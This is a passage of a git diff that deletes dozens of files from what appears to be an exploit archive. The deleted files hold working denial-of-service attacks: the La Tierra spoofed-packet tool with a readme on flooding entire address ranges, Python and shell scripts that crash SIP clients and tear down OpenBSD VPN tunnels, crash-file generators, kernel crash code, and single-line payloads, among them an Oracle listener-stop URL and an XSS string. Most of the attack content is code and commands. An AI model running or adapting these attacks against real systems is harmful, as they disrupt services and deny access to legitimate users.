printf("76-BR_SAT_MON 77-SUN_ND 78-WB_MON 79-WB_EXPAK 80-ISO_IP\n"); - printf("81-VMTP 82-SECURE_VMTP 83-VINES 84-TTP 85-NSFNET_IGP 86-DGP\n"); - printf("87-TCF 88-IGRP 89-OSPFIGP 90-SPRITE_RPG 91-LARP\n\n"); - printf("Supported:\n"); - printf(" 6-TCP 17-UDP (future: PPTP, SKIP) \n\n"); - - exit(-1); -} - -void print_arguments() -{ - printf("Arguments: \n"); - printf(" * -i dest_ip = destination ip address such as 1.1.1.1\n"); - printf(" If last octet is '-', then the address will increment\n"); - printf(" from 1 to 254 (Class C) on the next loop\n"); - printf(" and loop must be > 1 or %d (forever).\n", FOR_EVER); - printf(" Alternatives = 
zone=filename.txt or list=filename.txt (ASCII)\n"); - printf(" For list of alternative options, use -a instead of -h.\n"); - printf(" * -b port# = beginning port number (required).\n"); - printf(" -e port# = ending port number (optional)\n"); - printf(" -t = tcp flag options (f=fin,~s=syn,r=reset,~p=push,a=ack,u=urgent)\n"); - printf(" -v = time_to_live value, default=%d\n", DEFAULT_TTL); - printf(" -p protocol = ~6=tcp, 17=udp, use -p option for complete list\n"); - printf(" -w window_size = value from 0 to ?, default=%d\n", DEFAULT_WINSIZE); - printf(" -q tcp_sequence_number, default=%d\n", DEFAULT_SEQ); - printf(" -m message_type (~0=none,1=Out-Of-Band,4=Msg_DontRoute\n"); - printf(" -s seconds = delay between port numbers, default=%d\n", DEFAULT_FREQUENCY); - printf(" -o 1 = supress additional output to screen, default=0\n" ); - printf(" -l loop = times to loop through ports/scan, default=%d, %d=forever\n", 1, FOR_EVER); - printf(" * = required ~ = default parameter values\n\n"); - exit(-1); -} -/* End of file */ - - ------------------ readme.txt ------------------------------ - -La Tierra v1.0b - by MondoMan (KeG), elmondo@usa.net - - Modified version of land.c by m3lt, FLC - -To compile latierra, type: - - gcc latierra.c -o latierra - - To see the help screen, use 'latierra -h' - -This program crashes Windows 95, and will cause Windows NT -4.0, SP3 to utilize a high percentage of CPU. In some -instances, CPU usage reaches %100. - -land.c description: - -land.c sends a spoofed packet with the SYN flag from the -the same IP and port number as the destination. For -example, if you want to do a DoS on 1.1.1.1, port 80, it would -spoof 1.1.1.1 port 80 as the source. The problem is with -NT4 SP3, however, is once you issue this packet to a -port, NT4 SP3 appears to ignore all other attempts - - -UNTIL ... - - La Tierra! - -La Tierra description: - -La Tierra basically works by sending NT the same packet -used in land.c but to more than one port (if specified). 
-It doesn't appear to matter if the port is opened or closed! -NT doesn't appear to let this happen again on the same port -successively, but you simply change ports, and you can easily -go back to the original port and it'll work again. What's even -more interesting is the fact that port 139 works with this. -You would have thought - I'll leave that alone for now! - -While testing, I used a Compaq dual Intel Pentium Pro 200, and -was able to take up to %64 CPU. With one processor disabled, -CPU usage was %100. NT4 SP3 doesn't seem to crash, just needs -time to recover, even with one spoofed packet. - -Features include: - - - Ability to launch a DoS on an entire class C address - - Specify the beginning and ending port range - - Specify the number of loops or make it loop forever! - - User defined TCP flags: fin, syn, reset, push, ack, - and urgent - - Other IP options such as window size, time-to-live, - sequence_number, and message_type - - Ability to read a DNS zone file for IP addresses - - Ability to read a ASCII file containing IP addresses - -Command line options: - - - i ip_address - - DEFAULT: None - RANGE: Valid IP Address - OPTIONAL: No - - where ip_address is a valid ip_address, or if you wish to - cycle through a class C address, the last octet is dropped - and replaced with a '-'. This option is required. The - source and destination address are obtained from this value. - - Rather than specifying an IP address, you may wish to create - an ASCII file, or better yet, use nslookup to obtain all - zone information for a particular domain. The ASCII file - simply contains a list of IP addresses, one on each line. - - To get a DNS file, simply use nslookup, and the - "ls -d somedomain.com > filename.txt" command. You can use - 'latierra -n' to read more about the command sequence for - nslookup. - - In both types of files, lines that begin with ';' or '[' are - ignored. In DNS files, only 'A' records are processed. 
- - Examples: - - Single IP Address: - -i 10.1.2.1 - - Class C range: - -i 10.1.2.- - - ASCII file: - -i list=filename.txt - - DNS file: - -i zone=filename.txt - - -b beginning_port_number - - DEFAULT: None - RANGE: Positive Integer - OPTIONAL: No - - where this value is the port_number that latierra will use. If - no ending_port_number is specified, ending_port_number is then - equal to this value. Valid range is 1 to 0xFFFF - - -e ending_port_number - - DEFAULT: If not specified, equal to beginning_port_number - RANGE: Positive Integer - OPTIONAL: Yes - - is the highest port number in the range to cycle through. - - Example: - - -i 10.1.2.1 -b 23 -e 80 - - will start at port 23 and increment up to port 80. You can - delay the next increment by using the -s option. Valid range - is 1 to 0xFFFF - - -s seconds_between_spoofs - - DEFAULT: 1 - RANGE: Positive Integer - OPTIONAL: Yes - - You may want to control the seconds between spoofs. If you - specify a zero, no delays occur. - - In the below example, the spoof will between ports 23 and 80, - every 3 seconds. - - -i 10.1.2.1 -b 23 -e 80 -s 3 - - -l number_of_loops - - DEFAULT: 1 - RANGE: Positive Integer, -5 loops forever - OPTIONAL: Yes - - This option if set greater than 1, will cause a repeat of the - cycle. For example: - - -i 10.1.2.1 -b 23 -e 80 -s 0 -l 8 - - will cause latierra to go through ports 23 through 80 and - repeat the process 8 times, with no delay. Look at the - following example: - - -i 10.1.2.- -b 23 -e 80 -s 0 -l 8 - - latierra will start at 10.1.2.1, port 23 through 80, then - increment to 10.1.2.2, port 23 through 80, and so on until - it gets to 10.1.2.254, in which case it will repeat the - same procedure over again 8 times. - - By specifying a value of -5 for this option, latierra will - loop forever, until you manually stop the process. In the - last example above, the procedure would never end. When it - reaches 10.1.2.254, it falls back to 10.1.2.1 and start - over again from there. 
- - Other examples: - - -i 10.1.2.1 -b 139 -s 0 -l -5 - -i 10.1.2.- -b 80 -s 5 -l 10 - - -t tcp_flags - - DEFAULT: sp (SYN, PUSH) - RANGE: valid character set (see below) - OPTIONAL: Yes - - this option sets the various TCP flags, which include: - - f = fin s = syn r = reset - p = push a = ack u = urgent - - Example: - - -i 10.1.2.1 -b 139 -t apu -s 0 - - To set the ack, push, and urgent flag - - -v time_to_live_value - - DEFAULT: 0xFF (255 decimal) - RANGE: Positive Integer - OPTIONAL: Yes - - Sets the time to live value. - - -p protocol_value - - DEFAULT: 6 (tcp) - RANGE: Positive Integer - OPTIONAL: Yes - - Sets the protocol value in the IP header. To see a list of - available protocols, run "latierra -p". - - -w window_size_value - - DEFAULT: 0xFFFF (65000 decimal) - RANGE: Positive long value - OPTIONAL: Yes - - -q tcp_sequence_number_value - - DEFAULT: 0xF1C - RANGE: Positive integer - OPTIONAL: Yes - - -o 1 supress_additional_output - - DEFAULT: messages are printed for status - RANGE: None - OPTIONAL: Yes - - If you don't want to see the messages during the process, - simply use this "-o 1" to turn them off. - -Final Note: - -Please use this program for in-house testing purposes only. - -Just because your sending spoofed packets, doesn't mean you -can't be traced. - -Good luck. - -- MondoMan -elmondo@usa.net - --------------------- end of file ------------------------------- diff --git a/platforms/multiple/remote/20973.txt b/platforms/multiple/remote/20973.txt deleted file mode 100755 index 18ba85601..000000000 --- a/platforms/multiple/remote/20973.txt +++ /dev/null 
@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/2933/info
-
-Icecast is an open source audio-streaming server for both Unix and Microsoft Windows systems.
-
-Icecast does not sufficiently sanitize user-supplied input, or sanely handle unexpected input. Upon receiving a request from a user for a file that ends with a slash or period, the server will crash. The behaviour occurs when the remote attacker adds an '/', '\' or '.' to the end the URL they craft to request the file. The request of an existing file is not necessary, as the Icecast server will fail regardless.
-
-http://localhost:8000/file//
-
-NOTE: File is interpreted by Icecast as the 'root' directory and anything after 'file/' indicates the file request. The character '/' triggers the denial of service.
diff --git a/platforms/multiple/remote/22505.txt b/platforms/multiple/remote/22505.txt
deleted file mode 100755
index e3c9c1750..000000000
--- a/platforms/multiple/remote/22505.txt
+++ /dev/null
@@ -1,5 +0,0 @@
-source: http://www.securityfocus.com/bid/7375/info
-
-A vulnerability has been reported for the mod_access_referer Apache module. The problem occurs when parsing invalid HTTP referer header fields. If this vulnerability were to be triggered, it may be possible to trigger a NULL pointer dereference, effectively causing Apache to segfault.
-
-Referer: ://its-missing-http.com
\ No newline at end of file
diff --git a/platforms/multiple/remote/23231.txt b/platforms/multiple/remote/23231.txt
deleted file mode 100755
index dd5d65373..000000000
--- a/platforms/multiple/remote/23231.txt
+++ /dev/null
@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/8787/info
-
-It has been reported that Medieval Total War may be prone to a denial of service vulnerability. The issue is caused when an attacker sends a malformed value for nickname consisting of 0 Unicode characters to the server during the initial authentication process. The exploitation of this issue results in the all users receiving a "Connection expired" message before leading to a crash of the server.
-
-Successful exploitation of this issue may allow an attacker to cause the software to crash or hang.
-
-Medieval Total War versions 1.1 and prior are reported to be prone to this vulnerability.
-
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23231.zip
\ No newline at end of file
diff --git a/platforms/multiple/remote/25692.txt b/platforms/multiple/remote/25692.txt
deleted file mode 100755
index 00ff9866a..000000000
--- a/platforms/multiple/remote/25692.txt
+++ /dev/null
@@ -1,7 +0,0 @@
-source: http://www.securityfocus.com/bid/13712/info
-
-Warrior Kings: Battles is susceptible to a remote denial of service vulnerability. This is due to a failure of the game server to properly handle exceptional conditions.
-
-This vulnerability allows remote attackers to crash affected game servers, denying access to legitimate users.
-
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/25692.zip
\ No newline at end of file
diff --git a/platforms/multiple/remote/26336.txt b/platforms/multiple/remote/26336.txt
deleted file mode 100755
index e8169db73..000000000
--- a/platforms/multiple/remote/26336.txt
+++ /dev/null
@@ -1,11 +0,0 @@
-source: http://www.securityfocus.com/bid/15039/info
-
-Oracle Forms is susceptible to a vulnerability that allows remote attackers to stop the TNS Listener service, denying further database service to legitimate users.
-
-By issuing a specific HTTP request, remote attackers may cause the affected application to stop the TNS Listener.
-
-This issue was reported in Oracle Forms versions prior to July 2005.
-
-This issue was originally described and addressed in Oracle Critical Patch Update - July 2005, BID 14238 (Oracle July Security Update Multiple Vulnerabilities). Due to the availability of more information, this issue is being assigned a separate BID.
-
-http://www.example.com:8888/forms90/f90servlet?form=test.fmx&userid=SCOTT/TIGER@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=server)(PORT=1521)))(CONNECT_DATA=(COMMAND=STOP)(SERVICE=LISTENER)))&buffer_records=NO&debug_messages=NO&array=YES&query_only=NO&quiet=NO&RENDER=YES
\ No newline at end of file
diff --git a/platforms/multiple/remote/32362.txt b/platforms/multiple/remote/32362.txt
deleted file mode 100755
index 8c1b514d7..000000000
--- a/platforms/multiple/remote/32362.txt
+++ /dev/null
@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/31140/info
-
-Unreal Engine is prone to a remote denial-of-service vulnerability because of an error in memory allocation.
-
-An attacker could exploit this issue to crash applications that use the vulnerable engine and deny service to legitimate users.
-
-This issue affects Unreal Engine 3; other versions may also be affected.
-
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32362.zip
\ No newline at end of file
diff --git a/platforms/multiple/remote/35339.txt b/platforms/multiple/remote/35339.txt
deleted file mode 100755
index 280a7a310..000000000
--- a/platforms/multiple/remote/35339.txt
+++ /dev/null
@@ -1,38 +0,0 @@
-# Exploit Title: JourneyMap Disk-space consumption exploit
-# Date: 23Nov2014
-# Exploit Author: CovertCodes
-# Vendor Homepage: http://journeymap.techbrew.net/
-# Software Link: http://journeymap.techbrew.net/download/
-# Version: 5.0.0RC2 Ultimate Edition
-# Tested on: Linux
-
-
- JourneyMap (http://journeymap.techbrew.net/) is a mapping mod for
-Minecraft. It comes included with some modpacks, and is enabled by
-default in the popular Feed the Beast client. JourneyMap opens a web
-server on the client which is configured to listen on port 8080. When
-the client is running, a remote, unauthenticated user can have
-JourneyMap save a screenshot of the game to the hard drive by accessing
-a specific URL, consuming hard drive space. Here's an example:
-
-#!/bin/bash
- while true;
- do
- curl -o /dev/null 192.168.1.1:8080/action?type=savemap&mapType=day
- done
-
- This works even when the client has paused the game (by pressing
-escape.) We include mapType=day because the software should refuse to
-save a screenshot if the client user is underground, and the game is set
-on hardcore mode.
-
- Accessing the URL and triggering a screenshot will display a message
-on the client's screen, which may somewhat lessen the severity of this
-exploit. Further, it takes a long time to fill up disk using this
-technique. JourneyMap allows depth and resolution to be specified in
-the URL as well, though a few simple tests showed no change despite
-altering these parameters. If one were able to increase the depth and
-resolution of the image, the drive would fill up faster.
-
- Tested with JourneyMap 5.0.0RC2 Ultimate Edition, but presumed to
-work on other versions as well.
diff --git a/platforms/multiple/remote/35465.pl b/platforms/multiple/remote/35465.pl
deleted file mode 100755
index 8d4cf6c7b..000000000
--- a/platforms/multiple/remote/35465.pl
+++ /dev/null
@@ -1,58 +0,0 @@ -source: http://www.securityfocus.com/bid/46868/info - -VLC Media Player is prone to a denial-of-service vulnerability. - -Successful exploits may allow attackers to crash the affected application, denying service to legitimate users. - -VLC Media Player 1.0.5 is vulnerable; other versions may also be affected. - -#!/usr/bin/perl - -### -# Title : VLC media player v1.0.5 (.ape) Local Crash PoC -# Author : KedAns-Dz -# E-mail : ked-h@hotmail.com -# Home : HMD/AM (30008/04300) - Algeria -(00213555248701) -# Twitter page : twitter.com/kedans -# platform : Windows -# Impact : VLC media player Just Crashed -# Tested on : Windows XP SP3 Fran�ais -# Target : VLC media player v1.0.5 -### -# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all ) -# ------------ -# Usage : 1 - Creat APE file ( Monkey's Audio Format ) -# => 2 - Open APE file With VLC 1.0.5 -# => 3 - Crashed !!! -# ------------ -#START SYSTEM /root@MSdos/ : -system("title KedAns-Dz"); -system("color 1e"); -system("cls"); -print "\n\n"; -print " |===========================================================|\n"; -print " |= [!] Name : VLC media player v1.0.5 (Monkey's File) =|\n"; -print " |= [!] Exploit : Local Crash PoC =|\n"; -print " |= [!] Author : KedAns-Dz =|\n"; -print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n"; -print " |===========================================================|\n"; -sleep(2); -print "\n"; -# Creating ... -my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header -open(file , ">", "Kedans.ape"); # Evil File APE (16 bytes) 4.0 KB -print file $PoC; -print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! 
"; -close(file); - -#================[ Exploited By KedAns-Dz * HST-Dz * ]========================= -# Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > -# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{ -# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz * His0k4 * Dr.0rYX -# Cr3w-DZ * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , -# [ Special Greets to '3em GE Class' & all 3Se Pupils , BACALORIA 2011 Enchallah -# Messas Secondary School - Ain mlilla - 04300 - Algeria ] , -# Greets All My Friends (cit� 1850 logts - HassiMessaouD - 30008 -Algeria ) , -# ThanX : (hotturks.org) TeX * KadaVra ... all Muslimised Turkish Hackers . -# ThanX to : Kelvin.Xgr (kelvinx.net) Vietnamese Hacker . -#=============================================================================== \ No newline at end of file diff --git a/platforms/multiple/remote/9987.txt b/platforms/multiple/remote/9987.txt deleted file mode 100755 index 926fc98b9..000000000 --- a/platforms/multiple/remote/9987.txt +++ /dev/null 
@@ -1,70 +0,0 @@ -#!/usr/bin/python - -# ZoIPer v2.22 Call-Info Remote Denial Of Service. -# Remote Crash P.O.C. -# Author: Tomer Bitton (Gr33n_G0bL1n) -# Tested on Windows XP SP2 , SP3 , Ubuntu 8.10 -# -# Vendor Notified on: 21/09/2009 -# Vendor Fix: Fixed in version 2.24 Library 5324 -# -# Bad Chars: \x20 , \x09 - -import sys -import socket -import os - - -def main(argc , argv): - - if len(sys.argv) != 2: - os.system("cls") - sys.exit("Usage: " + sys.argv[0] + " \n") - - target_host = sys.argv[1] - target_port = 5060 - - evil_packet = "\x49\x4e\x56\x49\x54\x45\x20\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31"+\ - "\x30\x2e\x30\x2e\x30\x2e\x31\x20\x53\x49\x50\x2f\x32\x2e\x30\x0d"+\ - "\x0a\x56\x69\x61\x3a\x20\x53\x49\x50\x2f\x32\x2e\x30\x2f\x55\x44"+\ - "\x50\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31"+\ - "\x3a\x31\x32\x39\x38\x3b\x62\x72\x61\x6e\x63\x68\x3d\x7a\x39\x68"+\ - "\x47\x34\x62\x4b\x4a\x52\x6e\x54\x67\x67\x76\x4d\x47\x6c\x2d\x36"+\ - "\x32\x33\x33\x0d\x0a\x4d\x61\x78\x2d\x46\x6f\x72\x77\x61\x72\x64"+\ - "\x73\x3a\x20\x37\x30\x0d\x0a\x46\x72\x6f\x6d\x3a\x20\x4d\x6f\x72"+\ - "\x70\x68\x65\x75\x73\x20\x3c\x73\x69\x70\x3a\x4d\x6f\x72\x70\x68"+\ - "\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31"+\ - "\x33\x31\x3e\x3b\x74\x61\x67\x3d\x66\x37\x6d\x58\x5a\x71\x67\x71"+\ - "\x5a\x79\x2d\x36\x32\x33\x33\x0d\x0a\x54\x6f\x3a\x20\x4e\x65\x6f"+\ - "\x20\x3c\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31\x30\x2e\x30\x2e\x30"+\ - "\x2e\x31\x3e\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x44\x3a\x20\x77\x53"+\ - "\x48\x68\x48\x6a\x6e\x67\x39\x39\x2d\x36\x32\x33\x33\x40\x31\x39"+\ - "\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31\x0d\x0a\x43\x53"+\ - "\x65\x71\x3a\x20\x36\x32\x33\x33\x20\x49\x4e\x56\x49\x54\x45\x0d"+\ - "\x0a\x43\x6f\x6e\x74\x61\x63\x74\x3a\x20\x3c\x73\x69\x70\x3a\x4d"+\ - "\x6f\x72\x70\x68\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e"+\ - "\x35\x37\x2e\x31\x33\x31\x3e\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74"+\ - 
"\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69"+\ - "\x6f\x6e\x2f\x73\x64\x70\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x6e\x66"+\ - "\x6f\x3a\x20\x20\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c"+\ - "\x65\x6e\x67\x74\x68\x3a\x20\x31\x32\x35\x0d\x0a\x0d\x0a" - - os.system("cls") - print "[+] ZoIPer Call-Info Remote Denial Of Service\r\n" - print "[+] Exploited By Gr33n_G0bL1n\r\n" - print "[+] Connecting to %s on port %d\r\n" % (target_host,target_port) - - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - try: - s.connect((target_host,target_port)) - print "[+] Trying To Send Evil Packet...\r\n" - s.sendall(evil_packet) - s.close() - print "[+] Done!\r\n" - except: - print "[x] Connection Error!\r\n" - - -if (__name__ == "__main__"): - sys.exit(main(len(sys.argv), sys.argv)) - \ No newline at end of file diff --git a/platforms/multiple/webapps/24305.txt b/platforms/multiple/webapps/24305.txt deleted file mode 100755 index 690a6fcc2..000000000 --- a/platforms/multiple/webapps/24305.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/10782/info - -It is reported that VPOP3 is reported prone to a remote denial of service vulnerability. This issue presents itself when an attacker issues a URI request containing a large value for the 'msglistlen' parameter to the web mail interface. - -VPOP3 2.0.0k is reported prone to this issue, however, it is likely that other versions are affected as well. - -http://www.example.com:5108/messagelist.html?auth=MDA4MDA2MTQ6MTI3LjAuMC4xOmRpbWl0cmlz&msgliststart=0&msglistlen=10&sortfield=date&sortorder=A \ No newline at end of file diff --git a/platforms/multiple/webapps/24610.txt b/platforms/multiple/webapps/24610.txt deleted file mode 100755 index 0b16cc86a..000000000 --- a/platforms/multiple/webapps/24610.txt +++ /dev/null 
@@ -1,11 +0,0 @@ -source: http://www.securityfocus.com/bid/11213/info - -DNS4Me is reported to be susceptible to a denial of service vulnerability, and a cross-site scripting vulnerability. These vulnerabilities affect the built-in web server contained in the package. - -The first vulnerability reportedly allows attackers to cause the web server to consume all available CPU resources, and eventually crash the application. - -The second vulnerability is due to a failure of the application to properly sanitize user-supplied URI input. This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials or other attacks. - -Although these vulnerabilities are reported to exist in version 3.0.0.4 of DNS4Me, other versions may also be affected. - -http://www.example.com/?%3E%3Cscript%3Ealert('XSS')%3C/script%3E \ No newline at end of file diff --git a/platforms/novell/remote/19541.txt b/platforms/novell/remote/19541.txt deleted file mode 100755 index 57703274e..000000000 --- a/platforms/novell/remote/19541.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/700/info - - -Novell client versions 3.0 and 3.01 for Windows platforms are vulnerable to a remotely exploitable vulnerability which could cause a denial of service. The client opens a listening tcp socket on port 427, to which if a SYN is sent, results in the machine locking with a "blue screen" error. The only solution from that point is to reset the affected computer. - - -nmap -sS -p 427 \ No newline at end of file diff --git a/platforms/openbsd/local/21167.c b/platforms/openbsd/local/21167.c deleted file mode 100755 index bc31f5c69..000000000 --- a/platforms/openbsd/local/21167.c +++ /dev/null 
@@ -1,129 +0,0 @@ -source: http://www.securityfocus.com/bid/3612/info - -OpenBSD is a freely available implementation of the BSD Operating System. It is based on the NetBSD implementation. - -Under some conditions, an application launched by a regular user on the system can cause a system crash. When an application on an OpenBSD system attempts to pipe a NULL value, a fault in the kernel causes the system to crash immediately. - -This make it possible for a malicious local user to deny service to legitimate users of the system. - -/* obsd-crashme.c - by Marco Peereboom */ -/* December 03, 2001 */ - -#include -#include -#include -#include -#include -#include -#include - -/* globals */ -int fd[8]; /* temp pipe file descriptors */ -int fd_real[4]; /* real pipe's */ - -static int __DEBUG__ = 0; -static int __SYSLOG__ = 0; - -void enable_debug(void) -{ - __DEBUG__ = 1; -} - -void disable_debug(void) -{ - __DEBUG__ = 0; -} - -void enable_syslog(void) -{ - __SYSLOG__ = 1; -} - -void disable_syslog(void) -{ - __SYSLOG__ = 0; -} - -void s_fprintf(FILE *file, const char *fmt, ...) 
-{ - va_list ap; - - if (__DEBUG__) { - fflush(file); - - va_start(ap, fmt); - vfprintf(file, fmt, ap); - va_end(ap); - - fflush(file); - } - - if (__SYSLOG__) { - va_start(ap, fmt); - vsyslog(LOG_INFO, fmt, ap); - va_end(ap); - } -} - -void *s_malloc(size_t size) -{ - char serr[40]; /* can not allocate more mem so lets use this -ugly beast */ - void *p; - - if (__DEBUG__ || __SYSLOG__) { - s_fprintf(stderr, "PID=%-5i PPID=%-5i: malloc(%i)\n", -getpid(), getppid(), size); - } - - if ((p = malloc(size)) == NULL ) { - sprintf(serr,"PID=%i, Could not allocate memory", -getpid()); - perror(serr); - exit(6); - } - - return p; -} - -void s_perror(const char *str) -{ - char *buf; - - if (__DEBUG__ || __SYSLOG__) { - s_fprintf(stderr, "PID=%-5i PPID=%-5i: perror(%s)\n", -getpid(), getppid(), str); - } - - buf = s_malloc(11 + strlen(str)); /* PID=%-5i = 11 chars */ - sprintf(buf, "PID=%-5i %s", getpid(), str); - perror(buf); - - free(buf); -} - -void s_pipe(int *fd) -{ - if (__DEBUG__ || __SYSLOG__) { - s_fprintf(stderr, "PID=%-5i PPID=%-5i: pipe(%x)\n", -getpid(), getppid(), (unsigned int)fd); - } - - if (pipe(fd) == -1) - { - s_perror("Could not create pipe"); - exit(3); - } -} - -int main(int argc, char **argv) -{ - enable_debug(); - enable_syslog(); - - fprintf(stderr, "Before pipe\n"); - s_pipe(NULL); /* test if s_pipe exits */ - fprintf(stderr, "Will never reach this\n"); - - return 0; -} diff --git a/platforms/openbsd/remote/24181.sh b/platforms/openbsd/remote/24181.sh deleted file mode 100755 index c9d9a35f0..000000000 --- a/platforms/openbsd/remote/24181.sh +++ /dev/null 
@@ -1,44 +0,0 @@ -source: http://www.securityfocus.com/bid/10496/info - -It is reported that OpenBSD's isakmpd daemon is susceptible to a remote denial of service vulnerability. - -An attacker is able to delete security associations and policies from IPSec VPN's by sending a malformed UDP ISAKMP packet to a vulnerable server. The malformed packet contains payloads for both setting up a new tunnel and deleting a tunnel. Isakmpd improperly acts upon the delete payload and terminates the associations and policys relating to the tunnel. - -It is possible to destroy security associations, effectively eliminating the VPN connection between gateways, denying service to legitimate users of the VPN. - -#!/bin/sh - -if [ ! $# -eq 3 ]; then - echo "usage: $0 fake_src victim spi"; - exit; -fi - -src=$1; dst=$2 -spi=`echo $3 | sed 's/\(..\)/\\\\x\1/g'` -cky_i=`dd if=/dev/urandom bs=8 count=1 2>/dev/null` - -dnet hex \ - $cky_i \ - "\x00\x00\x00\x00\x00\x00\x00\x00" \ - "\x08\x10\x05\x00" \ - "\x00\x00\x00\x00" \ - "\x00\x00\x00\x5c" \ - "\x01\x00\x00\x04" \ - "\x0c\x00\x00\x2c" \ - "\x00\x00\x00\x01" \ - "\x00\x00\x00\x01" \ - "\x00\x00\x00\x20" \ - "\x01\x01\x00\x01" \ - "\x00\x00\x00\x18" \ - "\x00\x01\x00\x00" \ - "\x80\x01\x00\x05" \ - "\x80\x02\x00\x02" \ - "\x80\x03\x00\x01" \ - "\x80\x04\x00\x02" \ - "\x00\x00\x00\x10" \ - "\x00\x00\x00\x01" \ - "\x03\x04\x00\x01" \ - $spi | - dnet udp sport 500 dport 500 | - dnet ip proto udp src $src dst $dst | - dnet send diff --git a/platforms/osx/local/22074.txt b/platforms/osx/local/22074.txt deleted file mode 100755 index 7eee90814..000000000 --- a/platforms/osx/local/22074.txt +++ /dev/null 
@@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/6331/info - -Mac OS X is the BSD-derived operating system distributed and maintained by Apple Sofware. - -It has been reported that a denial of service exists in OS X. When a user creates a directory, descends it, creates another directory of the same name, then attempts to move the directory up one level in the hierarchy, the system reacts unpredictably. It has been reported that this can cause a crash of the system. - -mkdir ~/mydir; cd ~/mydir; mkdir mydir; mv mydir .. \ No newline at end of file diff --git a/platforms/osx/local/9845.c b/platforms/osx/local/9845.c deleted file mode 100755 index 0f71a4162..000000000 --- a/platforms/osx/local/9845.c +++ /dev/null @@ -1,48 +0,0 @@ -/* - Mac OS X 10.5.6-10.6.1 ptrace() mutex handling DoS - ================================================== - This code should be run in a loop and due to problems - with mutex handling in ptrace a DoS can occur when a - destroyed mutex is attempted to be interlocked by OSX - kernel giving rise to a race condition. You may need - to run this code multiple times. - - - Tested against 10.5.6 - - Tested against 10.5.7 - - Tested against 10.6.1 - - while `true`;do ./prdelka-vs-APPLE-ptracepanic;done - - -- prdelka -*/ -#include -#include -#include -#include - - -int main(){ - pid_t pid; - char *argv[] = {"id","","",0}; - char *envp[] = {"",0}; - pid = fork(); - if(pid == 0){ - usleep(100); - execve("/usr/bin/id",argv,envp); - } - else{ - usleep(820); - if(ptrace(PT_ATTACH,pid,0,0)==0){ - printf("[ PID: %d has been caught!\n",pid); - if(ptrace(PT_DETACH,pid,0,0)<0){ - perror("Evil happens."); - } - usleep(1); - wait(0); - } - else{ - perror("Fail!"); - } - } - return(0); -} diff --git a/platforms/osx/remote/20845.txt b/platforms/osx/remote/20845.txt deleted file mode 100755 index e1aec57e8..000000000 --- a/platforms/osx/remote/20845.txt +++ /dev/null 
@@ -1,14 +0,0 @@ -source: http://www.securityfocus.com/bid/2716/info - -Rumpus FTP Server is an implementation for MacOS which allows file-sharing across TCP/IP connections. - -It is possible to log in remotely to the server and shut down the service by making a directory with a name that is 65 characters long. Users must be authenticated to engage this attack. - -ftp host - -user anonymous -pass anonymous - -mkdir -aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -aaaaaaaa \ No newline at end of file diff --git a/platforms/php/remote/32769.php b/platforms/php/remote/32769.php deleted file mode 100755 index 3abb776bb..000000000 --- a/platforms/php/remote/32769.php +++ /dev/null @@ -1,10 +0,0 @@ -source: http://www.securityfocus.com/bid/33542/info - -PHP is prone to a denial-of-service vulnerability because it fails to limit global scope for certain settings relating to Unicode text operations. - -Attackers can exploit this issue to crash the affected webserver, denying service to legitimate users. - - \ No newline at end of file diff --git a/platforms/php/webapps/10242.txt b/platforms/php/webapps/10242.txt deleted file mode 100755 index f948edb44..000000000 --- a/platforms/php/webapps/10242.txt +++ /dev/null 
